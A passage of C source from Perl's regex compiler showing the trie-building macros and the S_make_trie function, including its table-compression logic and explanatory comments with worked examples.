assert(*uc != LATIN_SMALL_LETTER_SHARP_S); \
uvc = toLOWER_L1(*uc); \
if (UNLIKELY(uvc == MICRO_SIGN)) uvc = GREEK_SMALL_LETTER_MU; \
len = 1; \
} else { \
/* raw data, will be folded later if needed */ \
uvc = (U32)*uc; \
len = 1; \
} \
} STMT_END
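/* Editorial example of the non-UTF, PL_fold_latin1 branch above: reading 'K'
 * yields uvc == 'k' via toLOWER_L1(), and reading MICRO SIGN (U+00B5) is
 * special-cased to GREEK SMALL LETTER MU, since its Unicode fold lies
 * outside the Latin-1 range and toLOWER_L1() alone would leave it
 * unchanged. */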
#define TRIE_LIST_PUSH(state,fid,ns) STMT_START { \
if ( TRIE_LIST_CUR( state ) >=TRIE_LIST_LEN( state ) ) { \
U32 ging = TRIE_LIST_LEN( state ) * 2; \
Renew( trie->states[ state ].trans.list, ging, reg_trie_trans_le ); \
TRIE_LIST_LEN( state ) = ging; \
} \
TRIE_LIST_ITEM( state, TRIE_LIST_CUR( state ) ).forid = fid; \
TRIE_LIST_ITEM( state, TRIE_LIST_CUR( state ) ).newstate = ns; \
TRIE_LIST_CUR( state )++; \
} STMT_END
#define TRIE_LIST_NEW(state) STMT_START { \
Newx( trie->states[ state ].trans.list, \
4, reg_trie_trans_le ); \
TRIE_LIST_CUR( state ) = 1; \
TRIE_LIST_LEN( state ) = 4; \
} STMT_END
#define TRIE_HANDLE_WORD(state) STMT_START { \
U16 dupe= trie->states[ state ].wordnum; \
regnode * const noper_next = regnext( noper ); \
\
DEBUG_r({ \
/* store the word for dumping */ \
SV* tmp; \
if (OP(noper) != NOTHING) \
tmp = newSVpvn_utf8(STRING(noper), STR_LEN(noper), UTF); \
else \
tmp = newSVpvn_utf8( "", 0, UTF ); \
av_push( trie_words, tmp ); \
}); \
\
curword++; \
trie->wordinfo[curword].prev = 0; \
trie->wordinfo[curword].len = wordlen; \
trie->wordinfo[curword].accept = state; \
\
if ( noper_next < tail ) { \
if (!trie->jump) \
trie->jump = (U16 *) PerlMemShared_calloc( word_count + 1, \
sizeof(U16) ); \
trie->jump[curword] = (U16)(noper_next - convert); \
if (!jumper) \
jumper = noper_next; \
if (!nextbranch) \
nextbranch= regnext(cur); \
} \
\
if ( dupe ) { \
/* It's a dupe. Pre-insert into the wordinfo[].prev */\
/* chain, so that when the bits of chain are later */\
/* linked together, the dups appear in the chain */\
trie->wordinfo[curword].prev = trie->wordinfo[dupe].prev; \
trie->wordinfo[dupe].prev = curword; \
} else { \
/* we haven't inserted this word yet. */ \
trie->states[ state ].wordnum = curword; \
} \
} STMT_END
#define TRIE_TRANS_STATE(state,base,ucharcount,charid,special) \
( ( base + charid >= ucharcount \
&& base + charid < ubound \
&& state == trie->trans[ base - ucharcount + charid ].check \
&& trie->trans[ base - ucharcount + charid ].next ) \
? trie->trans[ base - ucharcount + charid ].next \
: ( state==1 ? special : 0 ) \
)
#define TRIE_BITMAP_SET_FOLDED(trie, uvc, folder) \
STMT_START { \
TRIE_BITMAP_SET(trie, uvc); \
/* store the folded codepoint */ \
if ( folder ) \
TRIE_BITMAP_SET(trie, folder[(U8) uvc ]); \
\
if ( !UTF ) { \
/* store first byte of utf8 representation of */ \
/* variant codepoints */ \
if (! UVCHR_IS_INVARIANT(uvc)) { \
TRIE_BITMAP_SET(trie, UTF8_TWO_BYTE_HI(uvc)); \
} \
} \
} STMT_END
#define MADE_TRIE 1
#define MADE_JUMP_TRIE 2
#define MADE_EXACT_TRIE 4
STATIC I32
S_make_trie(pTHX_ RExC_state_t *pRExC_state, regnode *startbranch,
regnode *first, regnode *last, regnode *tail,
U32 word_count, U32 flags, U32 depth)
{
/* first pass, loop through and scan words */
reg_trie_data *trie;
HV *widecharmap = NULL;
AV *revcharmap = newAV();
regnode *cur;
STRLEN len = 0;
UV uvc = 0;
U16 curword = 0;
U32 next_alloc = 0;
regnode *jumper = NULL;
regnode *nextbranch = NULL;
regnode *convert = NULL;
U32 *prev_states; /* temp array mapping each state to previous one */
/* we just use folder as a flag in utf8 */
const U8 * folder = NULL;
/* in the below add_data call we are storing either 'tu' or 'tuaa'
* which stands for one trie structure, one hash, optionally followed
* by two arrays */
#ifdef DEBUGGING
const U32 data_slot = add_data( pRExC_state, STR_WITH_LEN("tuaa"));
AV *trie_words = NULL;
/* along with revcharmap, this is only used during construction, but both are
* useful during debugging so we store them in the struct when debugging.
*/
#else
const U32 data_slot = add_data( pRExC_state, STR_WITH_LEN("tu"));
STRLEN trie_charcount=0;
#endif
SV *re_trie_maxbuff;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_MAKE_TRIE;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
switch (flags) {
case EXACT: case EXACT_ONLY8: case EXACTL: break;
case EXACTFAA:
case EXACTFUP:
case EXACTFU:
case EXACTFLU8: folder = PL_fold_latin1; break;
case EXACTF: folder = PL_fold; break;
default: Perl_croak( aTHX_ "panic! In trie construction, unknown node type %u %s", (unsigned) flags, PL_reg_name[flags] );
}
trie = (reg_trie_data *) PerlMemShared_calloc( 1, sizeof(reg_trie_data) );
trie->refcount = 1;
trie->startstate = 1;
trie->wordcount = word_count;
RExC_rxi->data->data[ data_slot ] = (void*)trie;
trie->charmap = (U16 *) PerlMemShared_calloc( 256, sizeof(U16) );
if (flags == EXACT || flags == EXACT_ONLY8 || flags == EXACTL)
trie->bitmap = (char *) PerlMemShared_calloc( ANYOF_BITMAP_SIZE, 1 );
trie->wordinfo = (reg_trie_wordinfo *) PerlMemShared_calloc(
trie->wordcount+1, sizeof(reg_trie_wordinfo));
DEBUG_r({
trie_words = newAV();
});
re_trie_maxbuff = get_sv(RE_TRIE_MAXBUF_NAME, GV_ADD);
assert(re_trie_maxbuff);
if (!SvIOK(re_trie_maxbuff)) {
sv_setiv(re_trie_maxbuff, RE_TRIE_MAXBUF_INIT);
}
DEBUG_TRIE_COMPILE_r({
Perl_re_indentf( aTHX_
"make_trie start==%d, first==%d, last==%d, tail==%d depth=%d\n",
depth+1,
REG_NODE_NUM(startbranch), REG_NODE_NUM(first),
REG_NODE_NUM(last), REG_NODE_NUM(tail), (int)depth);
});
/* Find the node we are going to overwrite */
if ( first == startbranch && OP( last ) != BRANCH ) {
/* whole branch chain */
convert = first;
} else {
/* branch sub-chain */
convert = NEXTOPER( first );
}
/* -- First loop and Setup --
We first traverse the branches and scan each word to determine if it
contains widechars, and how many unique chars there are; this is
important as we have to build a table with at least as many columns as we
have unique chars.
We use an array of integers to represent the character codes 0..255
(trie->charmap) and we use an HV* to store Unicode characters. We use
the native representation of the character value as the key and IVs for
the coded index.
*TODO* If we keep track of how many times each character is used we can
remap the columns so that the table compression later on is more
efficient in terms of memory by ensuring the most common value is in the
middle and the least common are on the outside. IMO this would be better
than a most-to-least-common mapping as there's a decent chance the most
common letter will share a node with the least common, meaning the node
will not be compressible. With a middle-is-most-common approach the worst
case is when we have the least common nodes twice.
*/
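/* Editorial example: for /foo|bar/ the two branches contribute the characters
 * f,o,o,b,a,r, so TRIE_CHARCOUNT ends up as 6 while trie->uniquecharcount is
 * 5 (f, o, b, a, r each get one column). */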
for ( cur = first ; cur < last ; cur = regnext( cur ) ) {
regnode *noper = NEXTOPER( cur );
const U8 *uc;
const U8 *e;
int foldlen = 0;
U32 wordlen = 0; /* required init */
STRLEN minchars = 0;
STRLEN maxchars = 0;
bool set_bit = trie->bitmap ? 1 : 0; /*store the first char in the
bitmap?*/
if (OP(noper) == NOTHING) {
/* skip past a NOTHING at the start of an alternation
* eg, /(?:)a|(?:b)/ should be the same as /a|b/
*
* If the next node is not something we are supposed to process
* we will just ignore it due to the condition guarding the
* next block.
*/
regnode *noper_next= regnext(noper);
if (noper_next < tail)
noper= noper_next;
}
if ( noper < tail
&& ( OP(noper) == flags
|| (flags == EXACT && OP(noper) == EXACT_ONLY8)
|| (flags == EXACTFU && ( OP(noper) == EXACTFU_ONLY8
|| OP(noper) == EXACTFUP))))
{
uc= (U8*)STRING(noper);
e= uc + STR_LEN(noper);
} else {
trie->minlen= 0;
continue;
}
if ( set_bit ) { /* bitmap only alloced when !(UTF&&Folding) */
TRIE_BITMAP_SET(trie,*uc); /* store the raw first byte
regardless of encoding */
if (OP( noper ) == EXACTFUP) {
/* false positives are ok, so just set this */
TRIE_BITMAP_SET(trie, LATIN_SMALL_LETTER_SHARP_S);
}
}
for ( ; uc < e ; uc += len ) { /* Look at each char in the current
branch */
TRIE_CHARCOUNT(trie)++;
TRIE_READ_CHAR;
/* TRIE_READ_CHAR returns the current character, or its fold if /i
* is in effect. Under /i, this character can match itself, or
* anything that folds to it. If not under /i, it can match just
* itself. Most folds are 1-1, for example k, K, and KELVIN SIGN
* all fold to k, and all are single characters. But some folds
* expand to more than one character, so for example LATIN SMALL
* LIGATURE FFI folds to the three character sequence 'ffi'. If
* the string beginning at 'uc' is 'ffi', it could be matched by
* three characters, or just by the one ligature character. (It
* could also be matched by two characters: LATIN SMALL LIGATURE FF
* followed by 'i', or by 'f' followed by LATIN SMALL LIGATURE FI).
* (Of course 'I' and/or 'F' instead of 'i' and 'f' can also
* match.) The trie needs to know the minimum and maximum number
* of characters that could match so that it can use size alone to
* quickly reject many match attempts. The max is simple: it is
* the number of folded characters in this branch (since a fold is
* never shorter than what folds to it). */
maxchars++;
/* And the min is equal to the max if not under /i (indicated by
* 'folder' being NULL), or there are no multi-character folds. If
* there is a multi-character fold, the min is incremented just
* once, for the character that folds to the sequence. Each
* character in the sequence needs to be added to the list below of
* characters in the trie, but we count only the first towards the
* min number of characters needed. This is done through the
* variable 'foldlen', which is returned by the macros that look
* for these sequences as the number of bytes the sequence
* occupies. Each time through the loop, we decrement 'foldlen' by
* how many bytes the current char occupies. Only when it reaches
* 0 do we increment 'minchars' or look for another multi-character
* sequence. */
if (folder == NULL) {
minchars++;
}
else if (foldlen > 0) {
foldlen -= (UTF) ? UTF8SKIP(uc) : 1;
}
else {
minchars++;
/* See if *uc is the beginning of a multi-character fold. If
* so, we decrement the length remaining to look at, to account
* for the current character this iteration. (We can use 'uc'
* instead of the fold returned by TRIE_READ_CHAR because for
* non-UTF, the latin1_safe macro is smart enough to account
* for all the unfolded characters, and because for UTF, the
* string will already have been folded earlier in the
* compilation process.) */
if (UTF) {
if ((foldlen = is_MULTI_CHAR_FOLD_utf8_safe(uc, e))) {
foldlen -= UTF8SKIP(uc);
}
}
else if ((foldlen = is_MULTI_CHAR_FOLD_latin1_safe(uc, e))) {
foldlen--;
}
}
/* The current character (and any potential folds) should be added
* to the possible matching characters for this position in this
* branch */
if ( uvc < 256 ) {
if ( folder ) {
U8 folded= folder[ (U8) uvc ];
if ( !trie->charmap[ folded ] ) {
trie->charmap[ folded ]=( ++trie->uniquecharcount );
TRIE_STORE_REVCHAR( folded );
}
}
if ( !trie->charmap[ uvc ] ) {
trie->charmap[ uvc ]=( ++trie->uniquecharcount );
TRIE_STORE_REVCHAR( uvc );
}
if ( set_bit ) {
/* store the codepoint in the bitmap, and its folded
* equivalent. */
TRIE_BITMAP_SET_FOLDED(trie, uvc, folder);
set_bit = 0; /* We've done our bit :-) */
}
} else {
/* XXX We could come up with the list of code points that fold
* to this using PL_utf8_foldclosures, except not for
* multi-char folds, as there may be multiple combinations
* there that could work, which needs to wait until runtime to
* resolve (The comment about LIGATURE FFI above is such an
* example.) */
SV** svpp;
if ( !widecharmap )
widecharmap = newHV();
svpp = hv_fetch( widecharmap, (char*)&uvc, sizeof( UV ), 1 );
if ( !svpp )
Perl_croak( aTHX_ "error creating/fetching widecharmap entry for 0x%" UVXf, uvc );
if ( !SvTRUE( *svpp ) ) {
sv_setiv( *svpp, ++trie->uniquecharcount );
TRIE_STORE_REVCHAR(uvc);
}
}
} /* end loop through characters in this branch of the trie */
/* We take the min and max for this branch and combine to find the min
* and max for all branches processed so far */
if( cur == first ) {
trie->minlen = minchars;
trie->maxlen = maxchars;
} else if (minchars < trie->minlen) {
trie->minlen = minchars;
} else if (maxchars > trie->maxlen) {
trie->maxlen = maxchars;
}
} /* end first pass */
DEBUG_TRIE_COMPILE_r(
Perl_re_indentf( aTHX_
"TRIE(%s): W:%d C:%d Uq:%d Min:%d Max:%d\n",
depth+1,
( widecharmap ? "UTF8" : "NATIVE" ), (int)word_count,
(int)TRIE_CHARCOUNT(trie), trie->uniquecharcount,
(int)trie->minlen, (int)trie->maxlen )
);
/*
We now know what we are dealing with in terms of unique chars and
string sizes so we can calculate how much memory a naive
representation using a flat table will take. If it's over a reasonable
limit (as specified by ${^RE_TRIE_MAXBUF}) we use a more memory-conservative
but potentially much slower representation using an array
of lists.
At the end we convert both representations into the same compressed
form that will be used in regexec.c for matching. The latter
is a form that cannot be used for construction but has memory
properties similar to the list form and access properties similar
to the table form, making it both suitable for fast searches and
small enough that it's feasible to store for the duration of a program.
See the comment in the code where the compressed table is produced
inplace from the flat table representation for an explanation of how
the compression works.
*/
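/* Editorial example of the size check below: continuing the /foo|bar/ case
 * (6 stored chars, 5 unique ones), a flat table would need
 * (6 + 1) * 5 + 1 = 36 reg_trie_trans entries, far below the usual
 * ${^RE_TRIE_MAXBUF} default, so the table compiler is chosen. */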
Newx(prev_states, TRIE_CHARCOUNT(trie) + 2, U32);
prev_states[1] = 0;
if ( (IV)( ( TRIE_CHARCOUNT(trie) + 1 ) * trie->uniquecharcount + 1)
> SvIV(re_trie_maxbuff) )
{
/*
Second Pass -- Array Of Lists Representation
Each state will be represented by a list of charid:state records
(reg_trie_trans_le); the first such element holds the CUR and LEN
points of the allocated array (see defines above).
We build the initial structure using the lists, and then convert
it into the compressed table form which allows faster lookups
(but can't be modified once converted).
*/
STRLEN transcount = 1;
DEBUG_TRIE_COMPILE_MORE_r( Perl_re_indentf( aTHX_ "Compiling trie using list compiler\n",
depth+1));
trie->states = (reg_trie_state *)
PerlMemShared_calloc( TRIE_CHARCOUNT(trie) + 2,
sizeof(reg_trie_state) );
TRIE_LIST_NEW(1);
next_alloc = 2;
for ( cur = first ; cur < last ; cur = regnext( cur ) ) {
regnode *noper = NEXTOPER( cur );
U32 state = 1; /* required init */
U16 charid = 0; /* sanity init */
U32 wordlen = 0; /* required init */
if (OP(noper) == NOTHING) {
regnode *noper_next= regnext(noper);
if (noper_next < tail)
noper= noper_next;
/* we will undo this assignment if noper does not
* point at a trieable type in the else clause of
* the following statement. */
}
if ( noper < tail
&& ( OP(noper) == flags
|| (flags == EXACT && OP(noper) == EXACT_ONLY8)
|| (flags == EXACTFU && ( OP(noper) == EXACTFU_ONLY8
|| OP(noper) == EXACTFUP))))
{
const U8 *uc= (U8*)STRING(noper);
const U8 *e= uc + STR_LEN(noper);
for ( ; uc < e ; uc += len ) {
TRIE_READ_CHAR;
if ( uvc < 256 ) {
charid = trie->charmap[ uvc ];
} else {
SV** const svpp = hv_fetch( widecharmap,
(char*)&uvc,
sizeof( UV ),
0);
if ( !svpp ) {
charid = 0;
} else {
charid=(U16)SvIV( *svpp );
}
}
/* charid is now 0 if we don't know the char read, or
* nonzero if we do */
if ( charid ) {
U16 check;
U32 newstate = 0;
charid--;
if ( !trie->states[ state ].trans.list ) {
TRIE_LIST_NEW( state );
}
for ( check = 1;
check <= TRIE_LIST_USED( state );
check++ )
{
if ( TRIE_LIST_ITEM( state, check ).forid
== charid )
{
newstate = TRIE_LIST_ITEM( state, check ).newstate;
break;
}
}
if ( ! newstate ) {
newstate = next_alloc++;
prev_states[newstate] = state;
TRIE_LIST_PUSH( state, charid, newstate );
transcount++;
}
state = newstate;
} else {
Perl_croak( aTHX_ "panic! In trie construction, no char mapping for %" IVdf, uvc );
}
}
} else {
/* If we end up here it is because we skipped past a NOTHING, but did not end up
* on a trieable type. So we need to reset noper back to point at the first regop
* in the branch before we call TRIE_HANDLE_WORD()
*/
noper= NEXTOPER(cur);
}
TRIE_HANDLE_WORD(state);
} /* end second pass */
/* next alloc is the NEXT state to be allocated */
trie->statecount = next_alloc;
trie->states = (reg_trie_state *)
PerlMemShared_realloc( trie->states,
next_alloc
* sizeof(reg_trie_state) );
/* and now dump it out before we compress it */
DEBUG_TRIE_COMPILE_MORE_r(dump_trie_interim_list(trie, widecharmap,
revcharmap, next_alloc,
depth+1)
);
trie->trans = (reg_trie_trans *)
PerlMemShared_calloc( transcount, sizeof(reg_trie_trans) );
{
U32 state;
U32 tp = 0;
U32 zp = 0;
for( state=1 ; state < next_alloc ; state ++ ) {
U32 base=0;
/*
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_printf( aTHX_ "tp: %d zp: %d ",tp,zp)
);
*/
if (trie->states[state].trans.list) {
U16 minid=TRIE_LIST_ITEM( state, 1).forid;
U16 maxid=minid;
U16 idx;
for( idx = 2 ; idx <= TRIE_LIST_USED( state ) ; idx++ ) {
const U16 forid = TRIE_LIST_ITEM( state, idx).forid;
if ( forid < minid ) {
minid=forid;
} else if ( forid > maxid ) {
maxid=forid;
}
}
if ( transcount < tp + maxid - minid + 1) {
transcount *= 2;
trie->trans = (reg_trie_trans *)
PerlMemShared_realloc( trie->trans,
transcount
* sizeof(reg_trie_trans) );
Zero( trie->trans + (transcount / 2),
transcount / 2,
reg_trie_trans );
}
base = trie->uniquecharcount + tp - minid;
if ( maxid == minid ) {
U32 set = 0;
for ( ; zp < tp ; zp++ ) {
if ( ! trie->trans[ zp ].next ) {
base = trie->uniquecharcount + zp - minid;
trie->trans[ zp ].next = TRIE_LIST_ITEM( state,
1).newstate;
trie->trans[ zp ].check = state;
set = 1;
break;
}
}
if ( !set ) {
trie->trans[ tp ].next = TRIE_LIST_ITEM( state,
1).newstate;
trie->trans[ tp ].check = state;
tp++;
zp = tp;
}
} else {
for ( idx=1; idx <= TRIE_LIST_USED( state ) ; idx++ ) {
const U32 tid = base
- trie->uniquecharcount
+ TRIE_LIST_ITEM( state, idx ).forid;
trie->trans[ tid ].next = TRIE_LIST_ITEM( state,
idx ).newstate;
trie->trans[ tid ].check = state;
}
tp += ( maxid - minid + 1 );
}
Safefree(trie->states[ state ].trans.list);
}
/*
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_printf( aTHX_ " base: %d\n",base);
);
*/
trie->states[ state ].trans.base=base;
}
trie->lasttrans = tp + 1;
}
} else {
/*
Second Pass -- Flat Table Representation.
We don't use the 0 slot of either trans[] or states[], so we add 1 to
each. We know that we will need Charcount+1 trans at most to store
the data (one row per char at worst case), so we preallocate both
structures assuming the worst case.
We then construct the trie using only the .next slots of the entry
structs.
We use the .check field of the first entry of the node temporarily
to make compression both faster and easier by keeping track of how
many non-zero fields are in the node.
Since trans are numbered from 1, any 0 pointer in the table is a FAIL
transition.
There are two terms in use here: state as a TRIE_NODEIDX() which is
a number representing the first entry of the node, and state as a
TRIE_NODENUM() which is the trans number. State 1 is both TRIE_NODEIDX(1)
and TRIE_NODENUM(1); with 2 entries per node, node 2 begins at trans
index 3, so TRIE_NODEIDX(2) == 3 and TRIE_NODENUM(3) == 2. Eg:
     A B         A B
  1. 2 4      1. 3 7
  2. 0 3      3. 0 5
  3. 0 0      5. 0 0
  4. 0 0      7. 0 0
The table is internally in the right-hand, idx form. However, as we
also have to deal with the states array, which is indexed by nodenum,
we have to use TRIE_NODENUM() to convert.
*/
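/* Editorial note: with the standard regcomp.h definitions this conversion
 * amounts to TRIE_NODEIDX(n) == (n - 1) * uniquecharcount + 1 and
 * TRIE_NODENUM(i) == (i - 1) / uniquecharcount + 1, which is what maps the
 * left-hand table above onto the right-hand one. */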
DEBUG_TRIE_COMPILE_MORE_r( Perl_re_indentf( aTHX_ "Compiling trie using table compiler\n",
depth+1));
trie->trans = (reg_trie_trans *)
PerlMemShared_calloc( ( TRIE_CHARCOUNT(trie) + 1 )
* trie->uniquecharcount + 1,
sizeof(reg_trie_trans) );
trie->states = (reg_trie_state *)
PerlMemShared_calloc( TRIE_CHARCOUNT(trie) + 2,
sizeof(reg_trie_state) );
next_alloc = trie->uniquecharcount + 1;
for ( cur = first ; cur < last ; cur = regnext( cur ) ) {
regnode *noper = NEXTOPER( cur );
U32 state = 1; /* required init */
U16 charid = 0; /* sanity init */
U32 accept_state = 0; /* sanity init */
U32 wordlen = 0; /* required init */
if (OP(noper) == NOTHING) {
regnode *noper_next= regnext(noper);
if (noper_next < tail)
noper= noper_next;
/* we will undo this assignment if noper does not
* point at a trieable type in the else clause of
* the following statement. */
}
if ( noper < tail
&& ( OP(noper) == flags
|| (flags == EXACT && OP(noper) == EXACT_ONLY8)
|| (flags == EXACTFU && ( OP(noper) == EXACTFU_ONLY8
|| OP(noper) == EXACTFUP))))
{
const U8 *uc= (U8*)STRING(noper);
const U8 *e= uc + STR_LEN(noper);
for ( ; uc < e ; uc += len ) {
TRIE_READ_CHAR;
if ( uvc < 256 ) {
charid = trie->charmap[ uvc ];
} else {
SV* const * const svpp = hv_fetch( widecharmap,
(char*)&uvc,
sizeof( UV ),
0);
charid = svpp ? (U16)SvIV(*svpp) : 0;
}
if ( charid ) {
charid--;
if ( !trie->trans[ state + charid ].next ) {
trie->trans[ state + charid ].next = next_alloc;
trie->trans[ state ].check++;
prev_states[TRIE_NODENUM(next_alloc)]
= TRIE_NODENUM(state);
next_alloc += trie->uniquecharcount;
}
state = trie->trans[ state + charid ].next;
} else {
Perl_croak( aTHX_ "panic! In trie construction, no char mapping for %" IVdf, uvc );
}
/* charid is now 0 if we don't know the char read, or
* nonzero if we do */
}
} else {
/* If we end up here it is because we skipped past a NOTHING, but did not end up
* on a trieable type. So we need to reset noper back to point at the first regop
* in the branch before we call TRIE_HANDLE_WORD().
*/
noper= NEXTOPER(cur);
}
accept_state = TRIE_NODENUM( state );
TRIE_HANDLE_WORD(accept_state);
} /* end second pass */
/* and now dump it out before we compress it */
DEBUG_TRIE_COMPILE_MORE_r(dump_trie_interim_table(trie, widecharmap,
revcharmap,
next_alloc, depth+1));
{
/*
* In-place compress the table.
For sparse data sets the table constructed by the trie algorithm will
be mostly 0/FAIL transitions, or to put it another way, mostly empty.
(Note that leaf nodes will not contain any transitions.)
This algorithm compresses the tables by eliminating most such
transitions, at the cost of a modest bit of extra work during lookup:
- Each states[] entry contains a .base field which indicates the
index in the trans[] array where its transition data is stored.
- If .base is 0 there are no valid transitions from that node.
- If .base is nonzero then charid is added to it to find an entry in
the trans array.
- If trans[states[state].base+charid].check != state then the
transition is taken to be a 0/Fail transition. Thus if there are fail
transitions at the front of the node then the .base offset will point
somewhere inside the previous nodes data (or maybe even into a node
even earlier), but the .check field determines if the transition is
valid.
XXX - wrong maybe?
The following process inplace converts the table to the compressed
table: We first do not compress the root node 1, and mark all its
.check pointers as 1 and set its .base pointer as 1 as well. This
allows us to do a DFA construction from the compressed table later,
and ensures that any .base pointers we calculate later are greater
than 0.
- We set 'pos' to indicate the first entry of the second node.
- We then iterate over the columns of the node, finding the first and
last used entry at l and m. We then copy l..m into pos..(pos+m-l),
and set the .check pointers accordingly, and advance pos
appropriately and repeat for the next node. Note that when we copy
the next pointers we have to convert them from the original
NODEIDX form to NODENUM form as the former is not valid post
compression.
- If a node has no transitions used we mark its base as 0 and do not
advance the pos pointer.
- If a node only has one transition we use a second pointer into the
structure to fill in allocated fail transitions from other states.
This pointer is independent of the main pointer and scans forward
looking for null transitions that are allocated to a state. When it
finds one it writes the single transition into the "hole". If the
pointer doesn't find one the single transition is appended as normal.
- Once compressed we can Renew/realloc the structures to release the
excess space.
See "Table-Compression Methods" in sec 3.9 of the Red Dragon,
specifically Fig 3.47 and the associated pseudocode.
demq
*/
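/* Illustrative sketch of the base/check scheme used below (made-up numbers):
* with uniquecharcount == 3, suppose state 5 uses only columns 1 and 2 and
* the write cursor 'pos' is 10 when we reach it. Then
*     states[5].trans.base = 10 + 3 - 1 = 12
* and a later lookup for charid c probes trans[ 12 + c - 3 ], i.e.
* trans[10] for c == 1 and trans[11] for c == 2, both of which were given
* .check == 5 when they were copied. For c == 0 the probe lands in trans[9],
* which belongs to an earlier state, so its .check != 5 and the transition
* is treated as a FAIL. */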
const U32 laststate = TRIE_NODENUM( next_alloc );
U32 state, charid;
U32 pos = 0, zp=0;
trie->statecount = laststate;
for ( state = 1 ; state < laststate ; state++ ) {
U8 flag = 0;
const U32 stateidx = TRIE_NODEIDX( state );
const U32 o_used = trie->trans[ stateidx ].check;
U32 used = trie->trans[ stateidx ].check;
trie->trans[ stateidx ].check = 0;
for ( charid = 0;
used && charid < trie->uniquecharcount;
charid++ )
{
if ( flag || trie->trans[ stateidx + charid ].next ) {
if ( trie->trans[ stateidx + charid ].next ) {
if (o_used == 1) {
for ( ; zp < pos ; zp++ ) {
if ( ! trie->trans[ zp ].next ) {
break;
}
}
trie->states[ state ].trans.base
= zp
+ trie->uniquecharcount
- charid ;
trie->trans[ zp ].next
= SAFE_TRIE_NODENUM( trie->trans[ stateidx
+ charid ].next );
trie->trans[ zp ].check = state;
if ( ++zp > pos ) pos = zp;
break;
}
used--;
}
if ( !flag ) {
flag = 1;
trie->states[ state ].trans.base
= pos + trie->uniquecharcount - charid ;
}
trie->trans[ pos ].next
= SAFE_TRIE_NODENUM(
trie->trans[ stateidx + charid ].next );
trie->trans[ pos ].check = state;
pos++;
}
}
}
trie->lasttrans = pos + 1;
trie->states = (reg_trie_state *)
PerlMemShared_realloc( trie->states, laststate
* sizeof(reg_trie_state) );
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_indentf( aTHX_ "Alloc: %d Orig: %" IVdf " elements, Final:%" IVdf ". Savings of %%%5.2f\n",
depth+1,
(int)( ( TRIE_CHARCOUNT(trie) + 1 ) * trie->uniquecharcount
+ 1 ),
(IV)next_alloc,
(IV)pos,
( ( next_alloc - pos ) * 100 ) / (double)next_alloc );
);
} /* end table compress */
}
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_indentf( aTHX_ "Statecount:%" UVxf " Lasttrans:%" UVxf "\n",
depth+1,
(UV)trie->statecount,
(UV)trie->lasttrans)
);
/* resize the trans array to remove unused space */
trie->trans = (reg_trie_trans *)
PerlMemShared_realloc( trie->trans, trie->lasttrans
* sizeof(reg_trie_trans) );
{ /* Modify the program and insert the new TRIE node */
U8 nodetype =(U8)(flags & 0xFF);
char *str=NULL;
#ifdef DEBUGGING
regnode *optimize = NULL;
#ifdef RE_TRACK_PATTERN_OFFSETS
U32 mjd_offset = 0;
U32 mjd_nodelen = 0;
#endif /* RE_TRACK_PATTERN_OFFSETS */
#endif /* DEBUGGING */
/*
This means we convert either the first branch or the first Exact,
depending on whether the thing following (in 'last') is a branch
or not and whether first is the startbranch (i.e. is it a sub part of
the alternation or is it the whole thing.)
Assuming it's a sub part we convert the EXACT; otherwise we convert
the whole branch sequence, including the first.
*/
/* Find the node we are going to overwrite */
if ( first != startbranch || OP( last ) == BRANCH ) {
/* branch sub-chain */
NEXT_OFF( first ) = (U16)(last - first);
#ifdef RE_TRACK_PATTERN_OFFSETS
DEBUG_r({
mjd_offset= Node_Offset((convert));
mjd_nodelen= Node_Length((convert));
});
#endif
/* whole branch chain */
}
#ifdef RE_TRACK_PATTERN_OFFSETS
else {
DEBUG_r({
const regnode *nop = NEXTOPER( convert );
mjd_offset= Node_Offset((nop));
mjd_nodelen= Node_Length((nop));
});
}
DEBUG_OPTIMISE_r(
Perl_re_indentf( aTHX_ "MJD offset:%" UVuf " MJD length:%" UVuf "\n",
depth+1,
(UV)mjd_offset, (UV)mjd_nodelen)
);
#endif
/* But first we check to see if there is a common prefix we can
split out as an EXACT and put in front of the TRIE node. */
trie->startstate= 1;
if ( trie->bitmap && !widecharmap && !trie->jump ) {
/* we want to find the first state that has more than
* one transition; if that state is not the first state
* then we have a common prefix which we can remove.
*/
U32 state;
for ( state = 1 ; state < trie->statecount-1 ; state++ ) {
U32 ofs = 0;
I32 first_ofs = -1; /* keeps track of the ofs of the first
transition, -1 means none */
U32 count = 0;
const U32 base = trie->states[ state ].trans.base;
/* does this state terminate an alternation? */
if ( trie->states[state].wordnum )
count = 1;
for ( ofs = 0 ; ofs < trie->uniquecharcount ; ofs++ ) {
if ( ( base + ofs >= trie->uniquecharcount ) &&
( base + ofs - trie->uniquecharcount < trie->lasttrans ) &&
trie->trans[ base + ofs - trie->uniquecharcount ].check == state )
{
if ( ++count > 1 ) {
/* we have more than one transition */
SV **tmp;
U8 *ch;
/* if this is the first state there is no common prefix
* to extract, so we can exit */
if ( state == 1 ) break;
tmp = av_fetch( revcharmap, ofs, 0);
ch = (U8*)SvPV_nolen_const( *tmp );
/* if we are on count 2 then we need to initialize the
* bitmap, and store the previous char in it if there
* was one */
if ( count == 2 ) {
/* clear the bitmap */
Zero(trie->bitmap, ANYOF_BITMAP_SIZE, char);
DEBUG_OPTIMISE_r(
Perl_re_indentf( aTHX_ "New Start State=%" UVuf " Class: [",
depth+1,
(UV)state));
if (first_ofs >= 0) {
SV ** const tmp = av_fetch( revcharmap, first_ofs, 0);
const U8 * const ch = (U8*)SvPV_nolen_const( *tmp );
TRIE_BITMAP_SET_FOLDED(trie,*ch, folder);
DEBUG_OPTIMISE_r(
Perl_re_printf( aTHX_ "%s", (char*)ch)
);
}
}
/* store the current firstchar in the bitmap */
TRIE_BITMAP_SET_FOLDED(trie,*ch, folder);
DEBUG_OPTIMISE_r(Perl_re_printf( aTHX_ "%s", ch));
}
first_ofs = ofs;
}
}
if ( count == 1 ) {
/* This state has only one transition, its transition is part
* of a common prefix - we need to concatenate the char it
* represents to what we have so far. */
SV **tmp = av_fetch( revcharmap, first_ofs, 0);
STRLEN len;
char *ch = SvPV( *tmp, len );
DEBUG_OPTIMISE_r({
SV *sv=sv_newmortal();
Perl_re_indentf( aTHX_ "Prefix State: %" UVuf " Ofs:%" UVuf " Char='%s'\n",
depth+1,
(UV)state, (UV)first_ofs,
